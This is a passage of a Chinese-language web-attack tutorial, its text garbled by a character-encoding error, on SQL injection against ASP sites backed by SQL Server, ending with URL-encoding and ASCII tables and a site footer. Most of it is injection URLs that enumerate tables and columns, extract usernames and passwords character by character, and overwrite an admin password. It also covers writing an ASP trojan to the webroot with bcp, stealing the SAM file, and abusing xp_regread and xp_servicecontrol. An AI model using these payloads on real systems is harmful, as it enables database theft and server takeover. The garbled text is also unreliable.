systemusers,sysuser,sysusers,sysaccounts,systemaccountsµÈ¡£²¢Í¨¹ýÓï¾ä½øÐÐÅжÏ
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from TestDB.dbo.±íÃû)>0 Èô±íÃû´æÔÚ£¬Ôòabc.asp¹¤×÷Õý³££¬·ñÔòÒì³£¡£Èç´ËÑ­»·£¬Ö±µ½²Âµ½ÏµÍ³ÕʺűíµÄÃû³Æ¡£
¶ÁÈ¡·¨£ºSQL-SERVERÓÐÒ»¸ö´æ·ÅϵͳºËÐÄÐÅÏ¢µÄ±ísysobjects£¬ÓйØÒ»¸ö¿âµÄËùÓÐ±í£¬ÊÓͼµÈÐÅϢȫ²¿´æ·ÅÔڴ˱íÖУ¬¶øÇҴ˱í¿ÉÒÔͨ¹ýWEB½øÐзÃÎÊ¡£
µ±xtype='U' and status>0´ú±íÊÇÓû§½¨Á¢µÄ±í£¬·¢ÏÖ²¢·ÖÎöÿһ¸öÓû§½¨Á¢µÄ±í¼°Ãû³Æ£¬±ã¿ÉÒԵõ½Óû§Ãû±íµÄÃû³Æ£¬»ù±¾µÄʵÏÖ·½·¨ÊÇ£º
¢ÙHTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestD ... type='U' and status>0 )>0 µÃµ½µÚÒ»¸öÓû§½¨Á¢±íµÄÃû³Æ£¬²¢ÓëÕûÊý½øÐбȽϣ¬ÏÔÈ»abc.asp¹¤×÷Òì³££¬µ«ÔÚÒì³£ÖÐÈ´¿ÉÒÔ·¢ÏÖ±íµÄÃû³Æ¡£¼ÙÉè·¢ÏֵıíÃûÊÇxyz£¬Ôò
¢ÚHTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestDB.dbo.sysobjects& ... tatus>0 and name not in('xyz'))>0 ¿ÉÒԵõ½µÚ¶þ¸öÓû§½¨Á¢µÄ±íµÄÃû³Æ£¬Í¬Àí¾Í¿ÉµÃµ½ËùÓÐÓý¨Á¢µÄ±íµÄÃû³Æ¡£
¸ù¾Ý±íµÄÃû³Æ£¬Ò»°ã¿ÉÒÔÈ϶¨ÄÇÕűíÓû§´æ·ÅÓû§Ãû¼°ÃÜÂ룬ÒÔϼÙÉè´Ë±íÃûΪAdmin¡£
l ²Â½âÓû§Ãû×ֶμ°ÃÜÂë×Ö¶ÎÃû³Æ
admin±íÖÐÒ»¶¨ÓÐÒ»¸öÓû§Ãû×ֶΣ¬Ò²Ò»¶¨ÓÐÒ»¸öÃÜÂë×ֶΣ¬Ö»Óеõ½´ËÁ½¸ö×ֶεÄÃû³Æ£¬²ÅÓпÉÄܵõ½´ËÁ½×ֶεÄÄÚÈÝ¡£ÈçºÎµÃµ½ËüÃǵÄÃû³ÆÄØ£¬Í¬ÑùÓÐÒÔÏÂÁ½ÖÖ·½·¨¡£
²Â½â·¨£º´Ë·½·¨¾ÍÊǸù¾Ý¸öÈ˵ľ­Ñé²Â×Ö¶ÎÃû£¬Ò»°ãÀ´Ëµ£¬Óû§Ãû×ֶεÄÃû³Æ³£Óãºusername,name,user,accountµÈ¡£¶øÃÜÂë×ֶεÄÃû³Æ³£Óãºpassword,pass,pwd,passwdµÈ¡£²¢Í¨¹ýÓï¾ä½øÐÐÅжÏ
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(×Ö¶ÎÃû) from TestDB.dbo.admin)>0 ¡°select count(×Ö¶ÎÃû) from ±íÃû¡±Óï¾äµÃµ½±íµÄÐÐÊý£¬ËùÒÔÈô×Ö¶ÎÃû´æÔÚ£¬Ôòabc.asp¹¤×÷Õý³££¬·ñÔòÒì³£¡£Èç´ËÑ­»·£¬Ö±µ½²Âµ½Á½¸ö×ֶεÄÃû³Æ¡£
¶ÁÈ¡·¨£º»ù±¾µÄʵÏÖ·½·¨ÊÇ
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select ... me(object_id('admin'),1) from TestDB.dbo.sysobjects)>0 ¡£select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjectsÊÇ´ÓsysobjectsµÃµ½ÒÑÖª±íÃûµÄµÚÒ»¸ö×Ö¶ÎÃû£¬µ±ÓëÕûÊý½øÐбȽϣ¬ÏÔÈ»abc.asp¹¤×÷Òì³££¬µ«ÔÚÒì³£ÖÐÈ´¿ÉÒÔ·¢ÏÖ×ֶεÄÃû³Æ¡£°Ñcol_name(object_id('admin'),1)ÖеÄ1ÒÀ´Î»»³É2,3,4,5£¬6¡­¾Í¿ÉµÃµ½ËùÓеÄ×Ö¶ÎÃû³Æ¡£
l ²Â½âÓû§ÃûÓëÃÜÂë
²ÂÓû§ÃûÓëÃÜÂëµÄÄÚÈÝ×î³£ÓÃÒ²ÊÇ×îÓÐЧµÄ·½·¨ÓУº
ASCIIÂëÖð×Ö½âÂë·¨:ËäÈ»ÕâÖÖ·½·¨ËٶȽÏÂý£¬µ«¿Ï¶¨ÊÇ¿ÉÐеġ£»ù±¾µÄ˼·ÊÇÏȲ³ö×ֶεij¤¶È£¬È»ºóÒÀ´Î²Â³öÿһλµÄÖµ¡£²ÂÓû§ÃûÓë²ÂÃÜÂëµÄ·½·¨Ïàͬ£¬ÒÔÏÂÒÔ²ÂÓû§ÃûΪÀý˵Ã÷Æä¹ý³Ì¡£
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top&n ... nbsp;from TestDB.dbo.admin)=X(X=1,2£¬3,4£¬5£¬¡­ n£¬usernameΪÓû§Ãû×ֶεÄÃû³Æ£¬adminΪ±íµÄÃû³Æ)£¬ÈôxΪijһֵiÇÒabc.aspÔËÐÐÕý³£Ê±£¬Ôòi¾ÍÊǵÚÒ»¸öÓû§ÃûµÄ³¤¶È¡£È磺µ±ÊäÈë
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top ... e) from TestDB.dbo.admin)=8ʱabc.aspÔËÐÐÕý³££¬ÔòµÚÒ»¸öÓû§ÃûµÄ³¤¶ÈΪ8
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (mµÄÖµÔÚ1µ½ÉÏÒ»²½µÃµ½µÄÓû§Ãû³¤¶ÈÖ®¼ä£¬µ±m=1£¬2,3£¬¡­Ê±²Â²â·Ö±ð²Â²âµÚ1,2,3,¡­Î»µÄÖµ£»nµÄÖµÊÇ1~9¡¢a~z¡¢A~ZµÄASCIIÖµ£¬Ò²¾ÍÊÇ1~128Ö®¼äµÄÈÎÒâÖµ£»adminΪϵͳÓû§ÕʺűíµÄÃû³Æ)£¬ÈônΪijһֵiÇÒabc.aspÔËÐÐÕý³£Ê±£¬Ôòi¶ÔÓ¦ASCIIÂë¾ÍÊÇÓû§Ãûijһλֵ¡£È磺µ±ÊäÈë
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,3,1)) from TestDB.dbo.admin)=80ʱabc.aspÔËÐÐÕý³££¬ÔòÓû§ÃûµÄµÚÈýλΪP(PµÄASCIIΪ80)£»
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,9,1)) from TestDB.dbo.admin)=33ʱabc.aspÔËÐÐÕý³££¬ÔòÓû§ÃûµÄµÚ9λΪ!(!µÄASCIIΪ80)£»
²Âµ½µÚÒ»¸öÓû§Ãû¼°ÃÜÂëºó£¬Í¬Àí£¬¿ÉÒԲ³öÆäËûËùÓÐÓû§ÃûÓëÃÜÂë¡£×¢Ò⣺ÓÐʱµÃµ½µÄÃÜÂë¿ÉÄÜÊǾ­MD5µÈ·½Ê½¼ÓÃܺóµÄÐÅÏ¢£¬»¹ÐèÒªÓÃרÓù¤¾ß½øÐÐÍÑÃÜ¡£»òÕßÏȸÄÆäÃÜÂ룬ʹÓÃÍêºóÔٸĻØÀ´£¬¼ûÏÂÃæ˵Ã÷¡£
¼òµ¥·¨£º²ÂÓû§ÃûÓÃ
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 ... o.admin where username>1) , flagÊÇadmin±íÖеÄÒ»¸ö×ֶΣ¬usernameÊÇÓû§Ãû×ֶΣ¬´Ëʱabc.asp¹¤×÷Òì³££¬µ«Äܵõ½UsernameµÄÖµ¡£ÓëÉÏͬÑùµÄ·½·¨£¬¿ÉÒԵõ½µÚ¶þÓû§Ãû£¬µÚÈý¸öÓû§µÈµÈ£¬Ö±µ½±íÖеÄËùÓÐÓû§Ãû¡£
²ÂÓû§ÃÜÂ룺HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1&nb ... B.dbo.admin where pwd>1) , flagÊÇadmin±íÖеÄÒ»¸ö×ֶΣ¬pwdÊÇÃÜÂë×ֶΣ¬´Ëʱabc.asp¹¤×÷Òì³££¬µ«Äܵõ½pwdµÄÖµ¡£ÓëÉÏͬÑùµÄ·½·¨£¬¿ÉÒԵõ½µÚ¶þÓû§ÃûµÄÃÜÂ룬µÚÈý¸öÓû§µÄÃÜÂëµÈµÈ£¬Ö±µ½±íÖеÄËùÓÐÓû§µÄÃÜÂë¡£ÃÜÂëÓÐʱÊǾ­MD5¼ÓÃܵģ¬¿ÉÒÔ¸ÄÃÜÂë¡£
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update TestDB.dbo.admin set pwd=' ... where username='www';-- ( 1µÄMD5ֵΪ£ºAAABBBCCCDDDEEEF£¬¼´°ÑÃÜÂë¸Ä³É1£»wwwΪÒÑÖªµÄÓû§Ãû)
ÓÃͬÑùµÄ·½·¨µ±È»¿É°ÑÃÜÂë¸ÄÔ­À´µÄÖµ¡£

2¡¢ÀûÓñíÄÚÈݵ¼³ÉÎļþ¹¦ÄÜ
SQLÓÐBCPÃüÁËü¿ÉÒ԰ѱíµÄÄÚÈݵ¼³ÉÎı¾Îļþ²¢·Åµ½Ö¸¶¨Î»Öá£ÀûÓÃÕâÏÄÜ£¬ÎÒÃÇ¿ÉÒÔÏȽ¨Ò»ÕÅÁÙʱ±í£¬È»ºóÔÚ±íÖÐÒ»ÐÐÒ»ÐеØÊäÈëÒ»¸öASPľÂí£¬È»ºóÓÃBCPÃüÁîµ¼³öÐγÉASPÎļþ¡£
ÃüÁîÐиñʽÈçÏ£º
bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp ¨Cc ¨CS localhost ¨CU sa ¨CP foobar ('S'²ÎÊýΪִÐвéѯµÄ·þÎñÆ÷£¬'U'²ÎÊýΪÓû§Ãû£¬'P'²ÎÊýΪÃÜÂ룬×îÖÕÉÏ´«ÁËÒ»¸öruncommand.aspµÄľÂí)
Áù¡¢µÃµ½ÏµÍ³µÄ¹ÜÀíԱȨÏÞ
ASPľÂíÖ»ÓÐUSERȨÏÞ£¬ÒªÏë»ñÈ¡¶ÔϵͳµÄÍêÈ«¿ØÖÆ£¬»¹ÒªÓÐϵͳµÄ¹ÜÀíԱȨÏÞ¡£Ôõô°ì£¿ÌáÉýȨÏ޵ķ½·¨ÓкܶàÖÖ£º
ÉÏ´«Ä¾Âí£¬Ð޸Ŀª»ú×Ô¶¯ÔËÐеÄ.iniÎļþ(ËüÒ»ÖØÆô£¬±ãËÀ¶¨ÁË)£»
¸´ÖÆCMD.exeµ½scripts£¬ÈËΪÖÆÔìUNICODE©¶´£»
ÏÂÔØSAMÎļþ£¬ÆƽⲢ»ñÈ¡OSµÄËùÓÐÓû§ÃûÃÜÂ룻
µÈµÈ£¬ÊÓϵͳµÄ¾ßÌåÇé¿ö¶ø¶¨£¬¿ÉÒÔ²ÉÈ¡²»Í¬µÄ·½·¨¡£

Æß¡¢¼¸¸öSQL-SERVERרÓÃÊÖ¶Î

1¡¢ÀûÓÃxp_regreadÀ©Õ¹´æ´¢¹ý³ÌÐÞ¸Ä×¢²á±í
[xp_regread]ÁíÒ»¸öÓÐÓõÄÄÚÖô洢¹ý³ÌÊÇxp_regXXXXÀàµÄº¯Êý¼¯ºÏ(Xp_regaddmultistring£¬Xp_regdeletekey£¬Xp_regdeletevalue£¬Xp_regenumkeys£¬Xp_regenumvalues£¬Xp_regread£¬Xp_regremovemultistring£¬Xp_regwrite)¡£¹¥»÷Õß¿ÉÒÔÀûÓÃÕâЩº¯ÊýÐÞ¸Ä×¢²á±í£¬Èç¶ÁÈ¡SAMÖµ£¬ÔÊÐí½¨Á¢¿ÕÁ¬½Ó£¬¿ª»ú×Ô¶¯ÔËÐгÌÐòµÈ¡£È磺
exec xp_regread HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares' È·¶¨Ê²Ã´ÑùµÄ»á»°Á¬½ÓÔÚ·þÎñÆ÷¿ÉÓá£
exec xp_regenumvalues HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities' ÏÔʾ·þÎñÆ÷ÉÏËùÓÐSNMPÍÅÌåÅäÖã¬ÓÐÁËÕâЩÐÅÏ¢£¬¹¥»÷Õß»òÐí»áÖØÐÂÅäÖÃͬһÍøÂçÖеÄÍøÂçÉ豸¡£

2¡¢ÀûÓÃÆäËû´æ´¢¹ý³ÌÈ¥¸Ä±ä·þÎñÆ÷
xp_servicecontrol¹ý³ÌÔÊÐíÓû§Æô¶¯£¬Í£Ö¹·þÎñ¡£È磺
(exec master..xp_servicecontrol 'start','schedule'
exec master..xp_servicecontrol 'start','server')
Xp_availablemedia ÏÔʾ»úÆ÷ÉÏÓÐÓõÄÇý¶¯Æ÷
Xp_dirtree ÔÊÐí»ñµÃÒ»¸öĿ¼Ê÷
Xp_enumdsn ÁоٷþÎñÆ÷ÉϵÄODBCÊý¾ÝÔ´
Xp_loginconfig »ñÈ¡·þÎñÆ÷°²È«ÐÅÏ¢
Xp_makecab ÔÊÐíÓû§ÔÚ·þÎñÆ÷ÉÏ´´½¨Ò»¸öѹËõÎļþ
Xp_ntsec_enumdomains ÁоٷþÎñÆ÷¿ÉÒÔ½øÈëµÄÓò
Xp_terminate_process Ìṩ½ø³ÌµÄ½ø³ÌID£¬ÖÕÖ¹´Ë½ø³Ì

¸½¼þÒ»£ºURLUnicode±í(½ÚÑ¡,Ö÷ÒªÊÇ·Ç×ÖĸµÄ×Ö·û£¬RFC1738)
×Ö·û¡¡¡¡¡¡¡¡ÌØÊâ×Ö·ûµÄº¬Òå¡¡¡¡¡¡¡¡¡¡¡¡¡¡URL±àÂë
¡¡ #¡¡¡¡¡¡¡¡¡¡¡¡ÓÃÀ´±êÖ¾Ìض¨µÄÎĵµÎ»Öá¡¡¡¡¡ %23
¡¡ %¡¡¡¡¡¡¡¡¡¡¡¡¶ÔÌØÊâ×Ö·û½øÐбàÂë¡¡¡¡¡¡¡¡¡¡%25
¡¡ &¡¡¡¡¡¡¡¡¡¡¡¡·Ö¸ô²»Í¬µÄ±äÁ¿Öµ¶Ô¡¡¡¡¡¡¡¡¡¡%26
¡¡ +¡¡¡¡¡¡¡¡¡¡¡¡ÔÚ±äÁ¿ÖµÖбíʾ¿Õ¸ñ¡¡¡¡¡¡¡¡¡¡%2B
¡¡ / ¡¡¡¡¡¡¡¡¡¡±íʾĿ¼·¾¶¡¡¡¡¡¡¡¡¡¡¡¡ %2F
\ %5C
=¡¡¡¡¡¡¡¡¡¡¡¡ÓÃÀ´Á¬½Ó¼üºÍÖµ¡¡¡¡¡¡¡¡¡¡¡¡¡¡%3D
¡¡ ?¡¡¡¡¡¡¡¡¡¡¡¡±íʾ²éѯ×Ö·û´®µÄ¿ªÊ¼¡¡¡¡¡¡¡¡%3F
¿Õ¸ñ %20
. ¾äºÅ %2E
£º ðºÅ %3A

¸½¼þ¶þ£ºASCII±í(½ÚÑ¡)
Dec Hex Char Dec Hex Char
80 50 P
32 20 (space) 81 51 Q
33 21 ! 82 52 R
34 22 " 83 53 S
35 23 # 84 54 T
36 24 $Content$nbsp; 85 55 U
37 25 % 86 56 V
38 26 & 87 57 W
39 27 ' 88 58 X
40 28 ( 89 59 Y
41 29 ) 90 5A Z
42 2A * 91 5B [
43 2B + 92 5C \
44 2C , 93 5D ]
45 2D - 94 5E ^
46 2E . 95 5F _
47 2F / 96 60 `
48 30 0 97 61 a
49 31 1 98 62 b
50 32 2 99 63 c
51 33 3 100 64 d
52 34 4
53 35 5 101 65 e
54 36 6 102 66 f
55 37 7 103 67 g
56 38 8 104 68 h
57 39 9 105 69 i
58 3A : 106 6A j
59 3B ; 107 6B k
60 3C < 108 6C l
61 3D = 109 6D m
62 3E > 110 6E n
63 3F ? 111 6F o
112 70 p
64 40 @ 113 72 q
65 41 A 114 72 r
66 42 B 115 73 s
67 43 C 116 74 t
68 44 D 117 75 u
69 45 E 118 76 v
70 46 F 119 77 w
71 47 G 120 78 x
72 48 H 121 79 y
73 49 I 122 7A z
74 4A J 123 7B {
75 4B K 124 7C |
76 4C L 125 7D }
77 4D M 126 7E ~
78 4E N 127 7F €
79 4F O 128 80 €
ÍøÂ簲ȫÈÈÃÅÎÄÕÂÅÅÐÐ
ÍøÕ¾ÔÞÖúÉÌ
¹ºÂò´ËλÖÃ

 

¹ØÓÚÎÒÃÇ | ÍøÕ¾µØͼ | ÎĵµÒ»ÀÀ | ÓÑÇéÁ´½Ó| ÁªÏµÎÒÃÇ

Copyright © 2003-2024 µçÄÔ°®ºÃÕß °æȨËùÓÐ ±¸°¸ºÅ£ºÂ³ICP±¸09059398ºÅ